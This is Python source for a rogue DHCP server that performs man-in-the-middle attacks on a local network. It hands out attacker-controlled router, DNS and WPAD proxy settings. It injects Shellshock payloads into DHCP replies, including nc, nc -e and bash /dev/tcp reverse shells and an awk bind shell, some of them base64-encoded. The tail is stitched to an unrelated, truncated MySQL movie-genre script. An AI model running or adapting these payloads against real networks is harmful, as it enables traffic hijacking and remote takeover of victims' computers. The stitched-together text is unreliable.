parser.add_argument('--proxy', type=str, help='Set Proxy URL, example: 192.168.0.1:8080', default=None)
parser.add_argument('--domain', type=str, help='Set domain name for search, default=local', default="local")
parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800)
parser.add_argument('-s', '--send_discover', action='store_true',
help='Send DHCP discover packets in the background thread')
parser.add_argument('-r', '--discover_rand_mac', action='store_true',
help='Use random MAC address for source MAC address in DHCP discover packets')
parser.add_argument('-d', '--discover_delay', type=float,
help='Set delay between DHCP discover packets (default=0.5 sec.)', default=0.5)
parser.add_argument('-O', '--shellshock_option_code', type=int,
                    help='Set DHCP option code for injecting shellshock payload, default=114', default=114)
parser.add_argument('-c', '--shellshock_command', type=str, help='Set shellshock command in DHCP client')
parser.add_argument('-b', '--bind_shell', action='store_true', help='Use awk bind tcp shell in DHCP client')
parser.add_argument('-p', '--bind_port', type=int, help='Set port to listen for bind shell (default=1234)', default=1234)
parser.add_argument('-N', '--nc_reverse_shell', action='store_true', help='Use nc reverse tcp shell in DHCP client')
parser.add_argument('-E', '--nce_reverse_shell', action='store_true', help='Use nc -e reverse tcp shell in DHCP client')
parser.add_argument('-R', '--bash_reverse_shell', action='store_true', help='Use bash reverse tcp shell in DHCP client')
parser.add_argument('-e', '--reverse_port', type=int, help='Set port to listen for reverse shell (default=443)', default=443)
parser.add_argument('-n', '--without_network', action='store_true', help='Do not add network configure in payload')
parser.add_argument('-B', '--without_base64', action='store_true', help='Do not use base64 encode in payload')
parser.add_argument('--ip_path', type=str,
help='Set path to "ip" in shellshock payload, default = /bin/', default="/bin/")
parser.add_argument('--iface_name', type=str,
help='Set iface name in shellshock payload, default = eth0', default="eth0")
parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response')
parser.add_argument('--dnsop', action='store_true', help='Do not send DHCP OFFER packets')
parser.add_argument('--exit', action='store_true', help='Exit on success MiTM attack')
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
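# Example invocation (illustrative only; the interface name and addresses below are placeholders):
#   dhcp_rogue_server.py -i eth0 -t 00:AA:BB:CC:DD:EE -T 192.168.1.10 --exit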
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
arp = ARP_raw()
ip = IP_raw()
udp = UDP_raw()
dhcp = DHCP_raw()
first_offer_ip_address = None
last_offer_ip_address = None
network_mask = None
target_mac_address = None
target_ip_address = None
dhcp_server_mac_address = None
dhcp_server_ip_address = None
router_ip_address = None
dns_server_ip_address = None
tftp_server_ip_address = None
wins_server_ip_address = None
wpad_url = None
dhcp_discover_packets_source_mac = None
free_ip_addresses = []
clients = {}
shellshock_url = None
domain = None
payload = None
SOCK = None
discover_sender_is_work = False
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for sniffing ARP and DHCP requests ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have MAC address!")
exit(1)
your_ip_address = Base.get_netiface_ip_address(current_network_interface)
if your_ip_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have IP address!")
exit(1)
your_network_mask = Base.get_netiface_netmask(current_network_interface)
if your_network_mask is None:
Base.print_error("Network interface: ", current_network_interface, " do not have network mask!")
exit(1)
if args.netmask is None:
network_mask = your_network_mask
else:
network_mask = args.netmask
# endregion
# region Create raw socket
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
# endregion
# region Get first and last IP address in your network
first_ip_address = str(IPv4Address(unicode(Base.get_netiface_first_ip(current_network_interface))) - 1)
last_ip_address = str(IPv4Address(unicode(Base.get_netiface_last_ip(current_network_interface))) + 1)
# endregion
# region Set target MAC and IP address, if target IP is not set - get first and last offer IP
if args.target_mac is not None:
target_mac_address = str(args.target_mac).lower()
# region Target IP is set
if args.target_ip is not None:
if args.target_mac is not None:
if not Base.ip_address_in_range(args.target_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-I, --target_ip`: ", args.target_ip,
"; target IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
target_ip_address = args.target_ip
else:
Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" +
", for target IP address: ", args.target_ip)
exit(1)
# Set default first offer IP and last offer IP
first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1)
last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1)
# endregion
# region Target IP is not set - get first and last offer IP
else:
# Check first offer IP address
if args.first_offer_ip is None:
first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1)
else:
if not Base.ip_address_in_range(args.first_offer_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-f, --first_offer_ip`: ", args.first_offer_ip,
"; first IP address in your network: ", first_ip_address)
exit(1)
else:
first_offer_ip_address = args.first_offer_ip
# Check last offer IP address
if args.last_offer_ip is None:
last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1)
else:
if not Base.ip_address_in_range(args.last_offer_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-l, --last_offer_ip`: ", args.last_offer_ip,
"; last IP address in your network: ", last_ip_address)
exit(1)
else:
last_offer_ip_address = args.last_offer_ip
# endregion
# endregion
# region Set DHCP sever MAC and IP address
if args.dhcp_mac is None:
dhcp_server_mac_address = your_mac_address
else:
dhcp_server_mac_address = args.dhcp_mac
if args.dhcp_ip is None:
dhcp_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.dhcp_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `--dhcp_ip`: ", args.dhcp_ip,
"; DHCP server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
dhcp_server_ip_address = args.dhcp_ip
# endregion
# region Set router, dns, tftp, wins IP address
# Set router IP address
if args.router is None:
router_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.router, first_ip_address, last_ip_address):
Base.print_error("Bad value `--router`: ", args.router,
"; Router IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
router_ip_address = args.router
# Set DNS server IP address
if args.dns is None:
dns_server_ip_address = your_ip_address
else:
if not Base.ip_address_validation(args.dns):
Base.print_error("Bad DNS server IP address in `--dns` parameter: ", args.dns)
exit(1)
else:
dns_server_ip_address = args.dns
# Set TFTP server IP address
if args.tftp is None:
tftp_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.tftp, first_ip_address, last_ip_address):
Base.print_error("Bad value `--tftp`: ", args.tftp,
"; TFTP server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
tftp_server_ip_address = args.tftp
# Set WINS server IP address
if args.wins is None:
wins_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.wins, first_ip_address, last_ip_address):
Base.print_error("Bad value `--wins`: ", args.tftp,
"; WINS server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
wins_server_ip_address = args.wins
# endregion
# region Set proxy
if args.proxy is not None:
# Set variables
wpad_url = "http://" + your_ip_address + "/wpad.dat"
apache2_sites_available_dir = "/etc/apache2/sites-available/"
apache2_sites_path = "/var/www/html/"
wpad_path = apache2_sites_path + "wpad/"
# Apache2 sites settings
default_site_file_name = "000-default.conf"
default_site_file = open(apache2_sites_available_dir + default_site_file_name, 'w')
default_site_file.write("<VirtualHost *:80>\n" +
"\tServerAdmin [email protected]\n" +
"\tDocumentRoot " + wpad_path + "\n" +
"\t<Directory " + wpad_path + ">\n" +
"\t\tOptions FollowSymLinks\n" +
"\t\tAllowOverride None\n" +
"\t\tOrder allow,deny\n" +
"\t\tAllow from all\n" +
"\t</Directory>\n" +
"</VirtualHost>\n")
default_site_file.close()
# Create dir with wpad.dat script
try:
makedirs(wpad_path)
except OSError:
Base.print_info("Path: ", wpad_path, " already exist")
except:
Base.print_error("Something else went wrong while trying to create path: ", wpad_path)
exit(1)
# Copy wpad.dat script
wpad_script_name = "wpad.dat"
wpad_script_src = utils_path + wpad_script_name
wpad_script_dst = wpad_path + wpad_script_name
copyfile(src=wpad_script_src, dst=wpad_script_dst)
# Read redirect script
with open(wpad_script_dst, 'r') as redirect_script:
content = redirect_script.read()
# Replace the Proxy URL
content = content.replace('proxy_url', args.proxy)
# Write redirect script
with open(wpad_script_dst, 'w') as redirect_script:
redirect_script.write(content)
# Restart Apache2 server
try:
Base.print_info("Restarting apache2 server ...")
sub.Popen(['service apache2 restart >/dev/null 2>&1'], shell=True)
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "service", " is not installed!")
exit(1)
else:
Base.print_error("Something went wrong while trying to run ", "`service apache2 restart`")
exit(2)
# Check apache2 is running
sleep(2)
apache2_pid = Base.get_process_pid("apache2")
if apache2_pid == -1:
Base.print_error("Apache2 server is not running!")
exit(1)
else:
Base.print_info("Apache2 server is running, PID: ", str(apache2_pid))
# endregion
# region Set Shellshock option code
if args.shellshock_option_code < 1 or args.shellshock_option_code > 254:
Base.print_error("Bad value: ", args.shellshock_option_code,
"in DHCP option code! This value should be in the range from 1 to 254")
exit(1)
# endregion
# region Set search domain
domain = bytes(args.domain)
# endregion
# region General output
if not args.quiet:
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your IP address: ", your_ip_address)
Base.print_info("Your MAC address: ", your_mac_address)
if target_mac_address is not None:
Base.print_info("Target MAC: ", target_mac_address)
# If target IP address is set print target IP, else print first and last offer IP
if target_ip_address is not None:
Base.print_info("Target IP: ", target_ip_address)
else:
Base.print_info("First offer IP: ", first_offer_ip_address)
Base.print_info("Last offer IP: ", last_offer_ip_address)
Base.print_info("DHCP server mac address: ", dhcp_server_mac_address)
Base.print_info("DHCP server ip address: ", dhcp_server_ip_address)
Base.print_info("Router IP address: ", router_ip_address)
Base.print_info("DNS server IP address: ", dns_server_ip_address)
Base.print_info("TFTP server IP address: ", tftp_server_ip_address)
if args.proxy is not None:
Base.print_info("Proxy url: ", args.proxy)
# endregion
# region Get free IP addresses in local network
def get_free_ip_addresses():
global Scanner
# Get all IP addresses in range from first to last offer IP address
current_ip_address = first_offer_ip_address
while IPv4Address(unicode(current_ip_address)) <= IPv4Address(unicode(last_offer_ip_address)):
free_ip_addresses.append(current_ip_address)
current_ip_address = str(IPv4Address(unicode(current_ip_address)) + 1)
Base.print_info("ARP scan on interface: ", current_network_interface, " is running ...")
localnet_ip_addresses = Scanner.find_ip_in_local_network(current_network_interface)
for ip_address in localnet_ip_addresses:
try:
free_ip_addresses.remove(ip_address)
except ValueError:
pass
# endregion
# region Add client info in global clients dictionary
def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False):
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Make DHCP offer packet
def make_dhcp_offer_packet(transaction_id, offer_ip, client_mac, destination_mac=None, destination_ip=None):
if destination_mac is None:
destination_mac = "ff:ff:ff:ff:ff:ff"
if destination_ip is None:
destination_ip = "255.255.255.255"
return dhcp.make_response_packet(source_mac=dhcp_server_mac_address,
destination_mac=destination_mac,
source_ip=dhcp_server_ip_address,
destination_ip=destination_ip,
transaction_id=transaction_id,
your_ip=offer_ip,
client_mac=client_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
dhcp_operation=2,
payload=None)
# endregion
# region Make DHCP ack packet
def make_dhcp_ack_packet(transaction_id, target_mac, target_ip, destination_mac=None, destination_ip=None):
if destination_mac is None:
destination_mac = "ff:ff:ff:ff:ff:ff"
if destination_ip is None:
destination_ip = "255.255.255.255"
return dhcp.make_response_packet(source_mac=dhcp_server_mac_address,
destination_mac=destination_mac,
source_ip=dhcp_server_ip_address,
destination_ip=destination_ip,
transaction_id=transaction_id,
your_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
dhcp_operation=5,
payload=shellshock_url,
proxy=bytes(wpad_url),
domain=domain,
tftp=tftp_server_ip_address,
wins=wins_server_ip_address,
payload_option_code=args.shellshock_option_code)
# endregion
# region Make DHCP nak packet
def make_dhcp_nak_packet(transaction_id, target_mac, target_ip, requested_ip):
return dhcp.make_nak_packet(source_mac=dhcp_server_mac_address,
destination_mac=target_mac,
source_ip=dhcp_server_ip_address,
destination_ip=requested_ip,
transaction_id=transaction_id,
your_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address)
# endregion
# def ack_sender():
# SOCK = socket(AF_PACKET, SOCK_RAW)
# SOCK.bind((current_network_interface, 0))
# ack_packet = make_dhcp_ack_packet(transaction_id_global, requested_ip_address)
# while True:
# SOCK.send(ack_packet)
# sleep(0.01)
# region Send DHCP discover packets
def discover_sender(number_of_packets=999999):
global discover_sender_is_work
discover_sender_is_work = True
packet_index = 0
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
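    # When the discover packets use a spoofed source MAC, pick a random IP from the
    # local network as the DHCP relay agent address; otherwise relay through our own IP.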
if dhcp_discover_packets_source_mac != your_mac_address:
relay_agent_ip_address = Base.get_netiface_random_ip(current_network_interface)
while packet_index < number_of_packets:
try:
discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac,
client_mac=eth.get_random_mac(),
host_name=Base.make_random_string(8),
relay_ip=relay_agent_ip_address)
SOCK.send(discover_packet)
sleep(args.discover_delay)
except:
Base.print_error("Something went wrong when sending DHCP discover packets!")
packet_index += 1
else:
while packet_index < number_of_packets:
try:
discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac,
client_mac=eth.get_random_mac(),
host_name=Base.make_random_string(8),
relay_ip=your_ip_address)
SOCK.send(discover_packet)
sleep(args.discover_delay)
except:
Base.print_error("Something went wrong when sending DHCP discover packets!")
packet_index += 1
SOCK.close()
discover_sender_is_work = False
# endregion
# region Reply to DHCP and ARP requests
def reply(request):
# region Define global variables
global SOCK
global clients
global target_ip_address
global router_ip_address
global payload
global shellshock_url
global args
global discover_sender_is_work
# endregion
# region DHCP
if 'DHCP' in request.keys():
# region Get transaction id and client MAC address
transaction_id = request['BOOTP']['transaction-id']
client_mac_address = request['BOOTP']['client-mac-address']
# endregion
# region Check this client already in dict
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region DHCP DISCOVER
if request['DHCP'][53] == 1:
# region Print INFO message
Base.print_info("DHCP DISCOVER from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# endregion
# If parameter "Do not send DHCP OFFER packets" is not set
if not args.dnsop:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# If target IP address is set - offer IP = target IP
if target_ip_address is not None:
offer_ip_address = target_ip_address
# If target IP address is not set - offer IP = random IP from free IP addresses list
else:
                    random_index = randint(0, len(free_ip_addresses) - 1)
offer_ip_address = free_ip_addresses[random_index]
# Delete offer IP from free IP addresses list
del free_ip_addresses[random_index]
if args.broadcast_response:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address)
else:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address,
client_mac_address, offer_ip_address)
SOCK.send(offer_packet)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"transaction": transaction_id, "discover": True,
"offer_ip": offer_ip_address},
client_already_in_dictionary)
# Print INFO message
Base.print_info("DHCP OFFER to: ", client_mac_address, " offer IP: ", offer_ip_address)
# endregion
# region DHCP RELEASE
if request['DHCP'][53] == 7:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
Base.print_info("DHCP RELEASE from: ", client_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"client_ip": client_ip},
client_already_in_dictionary)
# print clients
# Add release client IP in free IP addresses list
if client_ip not in free_ip_addresses:
free_ip_addresses.append(client_ip)
else:
Base.print_info("DHCP RELEASE from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"release": True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP INFORM
if request['DHCP'][53] == 8:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
Base.print_info("DHCP INFORM from: ", client_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# If client IP in free IP addresses list delete this
if client_ip in free_ip_addresses:
free_ip_addresses.remove(client_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"client_ip": client_ip},
client_already_in_dictionary)
# print clients
else:
Base.print_info("DHCP INFORM from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"inform": True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP REQUEST
if request['DHCP'][53] == 3:
# region Set local variables
requested_ip = "0.0.0.0"
offer_ip = None
# endregion
# region Get requested IP
if 50 in request['DHCP'].keys():
requested_ip = str(request['DHCP'][50])
# endregion
# region Print info message
Base.print_info("DHCP REQUEST from: ", client_mac_address, " transaction id: ", hex(transaction_id),
" requested ip: ", requested_ip)
# endregion
# region Requested IP not in range from first offer IP to last offer IP
if not Base.ip_address_in_range(requested_ip, first_offer_ip_address, last_offer_ip_address):
Base.print_warning("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not in range: ", first_offer_ip_address + " - " + last_offer_ip_address)
# endregion
# region Requested IP in range from first offer IP to last offer IP
else:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# region Change client info in global clients dictionary
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"request": True, "requested_ip": requested_ip,
"transaction": transaction_id},
client_already_in_dictionary)
# Delete ARP mitm success keys in dictionary for this client
clients[client_mac_address].pop('client request his ip', None)
clients[client_mac_address].pop('client request router ip', None)
clients[client_mac_address].pop('client request dns ip', None)
# endregion
# region Get offer IP address
try:
offer_ip = clients[client_mac_address]["offer_ip"]
except KeyError:
pass
# endregion
# region This client already send DHCP DISCOVER and offer IP != requested IP
if offer_ip is not None and offer_ip != requested_ip:
# Print error message
Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not like offer IP: ", offer_ip)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, offer_ip, requested_ip)
SOCK.send(nak_packet)
Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"mitm": "error: offer ip not like requested ip", "offer_ip": None},
client_already_in_dictionary)
# print clients
# endregion
# region Offer IP == requested IP or this is a first request from this client
else:
# region Target IP address is set and requested IP != target IP
if target_ip_address is not None and requested_ip != target_ip_address:
# Print error message
Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not like target IP: ", target_ip_address)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address,
target_ip_address, requested_ip)
SOCK.send(nak_packet)
Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"mitm": "error: target ip not like requested ip", "offer_ip": None,
"nak": True},
client_already_in_dictionary)
# endregion
# region Target IP address is set and requested IP == target IP or Target IP is not set
else:
# region Settings shellshock payload
# region Create payload
# Network settings command in target machine
net_settings = args.ip_path + "ip addr add " + requested_ip + "/" + \
str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";"
# Shellshock payload: <user bash command>
if args.shellshock_command is not None:
payload = args.shellshock_command
# Shellshock payload:
# awk 'BEGIN{s="/inet/tcp/<bind_port>/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &
if args.bind_shell:
payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \
"/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &"
# Shellshock payload:
# rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f &
if args.nc_reverse_shell:
payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \
your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &"
# Shellshock payload:
# /bin/nc -e /bin/sh <your_ip> <your_port> 2>&1 &
if args.nce_reverse_shell:
payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str(args.reverse_port) + " 2>&1 &"
# Shellshock payload:
# /bin/bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1 &
if args.bash_reverse_shell:
payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \
"/" + str(args.reverse_port) + " 0>&1 &"
if payload is not None:
# Do not add network settings command in payload
if not args.without_network:
payload = net_settings + payload
# Send payload to target in clear text
if args.without_base64:
shellshock_url = "() { :; }; " + payload
# Send base64 encoded payload to target in clear text
else:
payload = b64encode(payload)
shellshock_url = "() { :; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")"
# endregion
# region Check Shellshock payload length
if shellshock_url is not None:
if len(shellshock_url) > 255:
Base.print_error("Length of shellshock payload is very big! Current length: ",
str(len(shellshock_url)), " Maximum length: ", "254")
shellshock_url = "A"
# endregion
# endregion
# region Send DHCP ack and print info message
if args.broadcast_response:
ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip)
else:
ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip,
client_mac_address, requested_ip)
Base.print_info("DHCP ACK to: ", client_mac_address, " requested ip: ", requested_ip)
SOCK.send(ack_packet)
# endregion
# region Add client info in global clients dictionary
try:
clients[client_mac_address].update({"mitm": "success"})
except KeyError:
clients[client_mac_address] = {"mitm": "success"}
# endregion
# endregion
# endregion
# endregion
# endregion
# region DHCP DECLINE
if request['DHCP'][53] == 4:
# Get requested IP
requested_ip = "0.0.0.0"
if 50 in request['DHCP'].keys():
requested_ip = str(request['DHCP'][50])
# Print info message
Base.print_info("DHCP DECLINE from: ", requested_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# If client IP in free IP addresses list delete this
if requested_ip in free_ip_addresses:
free_ip_addresses.remove(requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"decline_ip": requested_ip, "decline": True},
client_already_in_dictionary)
# print clients
# endregion
# endregion DHCP
# region ARP
if 'ARP' in request.keys():
if request['Ethernet']['destination'] == "ff:ff:ff:ff:ff:ff" and \
request['ARP']['target-mac'] == "00:00:00:00:00:00":
# region Set local variables
arp_sender_mac_address = request['ARP']['sender-mac']
arp_sender_ip_address = request['ARP']['sender-ip']
arp_target_ip_address = request['ARP']['target-ip']
# endregion
# region Print info message
Base.print_info("ARP request from: ", arp_sender_mac_address,
" \"", "Who has " + arp_target_ip_address + "? Tell " + arp_sender_ip_address, "\"")
# endregion
# region Get client mitm status
try:
mitm_status = clients[arp_sender_mac_address]["mitm"]
except KeyError:
mitm_status = ""
# endregion
# region Get client requested ip
try:
requested_ip = clients[arp_sender_mac_address]["requested_ip"]
except KeyError:
requested_ip = ""
# endregion
# region Create IPv4 address conflict
if mitm_status.startswith("error"):
arp_reply = arp.make_response(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=arp_sender_mac_address,
sender_mac=your_mac_address, sender_ip=arp_target_ip_address,
target_mac=arp_sender_mac_address, target_ip=arp_sender_ip_address)
SOCK.send(arp_reply)
Base.print_info("ARP response to: ", arp_sender_mac_address,
" \"", arp_target_ip_address + " is at " + your_mac_address,
"\" (IPv4 address conflict)")
# endregion
# region MITM success
if mitm_status.startswith("success"):
if arp_target_ip_address == requested_ip:
clients[arp_sender_mac_address].update({"client request his ip": True})
if arp_target_ip_address == router_ip_address:
clients[arp_sender_mac_address].update({"client request router ip": True})
if arp_target_ip_address == dns_server_ip_address:
clients[arp_sender_mac_address].update({"client request dns ip": True})
try:
test = clients[arp_sender_mac_address]["client request his ip"]
test = clients[arp_sender_mac_address]["client request router ip"]
test = clients[arp_sender_mac_address]["client request dns ip"]
try:
test = clients[arp_sender_mac_address]["success message"]
except KeyError:
if args.exit:
sleep(3)
Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")")
exit(0)
else:
Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")")
clients[arp_sender_mac_address].update({"success message": True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region Main function
if __name__ == "__main__":
# region Add ip addresses in list with free ip addresses from first to last offer IP
if target_ip_address is None:
Base.print_info("Create list with free IP addresses in your network ...")
get_free_ip_addresses()
# endregion
# region Send DHCP discover packets in the background thread
if args.send_discover:
Base.print_info("Start DHCP discover packets send in the background thread ...")
if args.discover_rand_mac:
dhcp_discover_packets_source_mac = eth.get_random_mac()
Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac,
" (random MAC address)")
else:
dhcp_discover_packets_source_mac = your_mac_address
Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac,
" (your MAC address)")
Base.print_info("Delay between DHCP discover packets: ", str(args.discover_delay))
tm.add_task(discover_sender)
# endregion
# region Sniff network
# region Create RAW socket for sniffing
raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
Base.print_info("Waiting for a ARP or DHCP requests ...")
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[0:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
if dhcp_discover_packets_source_mac is not None:
if ethernet_header_dict['source'] == dhcp_discover_packets_source_mac:
break
# endregion
# region ARP packet
# 2054 - Type of ARP packet (0x0806)
if ethernet_header_dict['type'] == arp.packet_type:
# region Parse ARP packet
arp_header = packet[eth.header_length:eth.header_length + arp.packet_length]
arp_packet_dict = arp.parse_packet(arp_header)
# endregion
# region Could not parse ARP packet - break
if arp_packet_dict is None:
break
# endregion
# region ARP filter
if arp_packet_dict['opcode'] != 1:
break
# endregion
# region Call function with full ARP packet
reply({
'Ethernet': ethernet_header_dict,
'ARP': arp_packet_dict
})
# endregion
# endregion
# region IP packet
# 2048 - Type of IP packet (0x0800)
if ethernet_header_dict['type'] == ip.header_type:
# region Parse IP header
ip_header = packet[eth.header_length:]
ip_header_dict = ip.parse_header(ip_header)
# endregion
# region Could not parse IP header - break
if ip_header_dict is None:
break
# endregion
# region UDP
if ip_header_dict['protocol'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + (ip_header_dict['length'] * 4)
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header is None:
break
# endregion
# region DHCP packet
if udp_header_dict['destination-port'] == 67 and udp_header_dict['source-port'] == 68:
# region Parse DHCP packet
dhcp_packet_offset = udp_header_offset + udp.header_length
dhcp_packet = packet[dhcp_packet_offset:]
dhcp_packet_dict = dhcp.parse_packet(dhcp_packet)
# endregion
# region Could not parse DHCP packet - break
if dhcp_packet_dict is None:
break
# endregion
# region Call function with full DHCP packet
full_dhcp_packet = {
'Ethernet': ethernet_header_dict,
'IP': ip_header_dict,
'UDP': udp_header_dict
}
full_dhcp_packet.update(dhcp_packet_dict)
reply(full_dhcp_packet)
# endregion
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
# endregion
# endregion
# endregion
# endregion
| unlicense | 2,859,265,539,066,611,700 | 41.478261 | 131 | 0.544649 | false | 4.269039 | false | false | false |
jadhavhninad/-CSE_515_MWD_Analytics- | Phase 1/Project Code/phase1_code/differentiate_genre.py | 1 | 17298 | from mysqlConn import DbConnect
import argparse
import operator
from math import log,fabs
import pprint
#DB connector and cursor
db = DbConnect()
db_conn = db.get_connection()
cur2 = db_conn.cursor();
#Argument parser
parser = argparse.ArgumentParser()
parser.add_argument("GENRE1")
parser.add_argument("GENRE2")
parser.add_argument("MODEL")
args = parser.parse_args()
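# Example invocation (illustrative; the genre names are placeholders):
#   python differentiate_genre.py Thriller Comedy TF-IDF-DIFF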
##########################################
#General computation
#########################################
#1. Getting total number of movies in genre1 U genre2
cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result0 = cur2.fetchone()
total_movie_count = float(result0[0])
if args.MODEL== "TF-IDF-DIFF":
###############################
#MODEL = TF_IDF_DIFF
###############################
#===============================================================================================
#Subtask-1 : Calculate the weighted unique movies count returned by a tag for set of movies in genre1 U genre2
#===============================================================================================
cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result0 = cur2.fetchone()
total_movie_count = result0[0]
    #Since we already have the TF value and its data, we now generate the required data for idf.
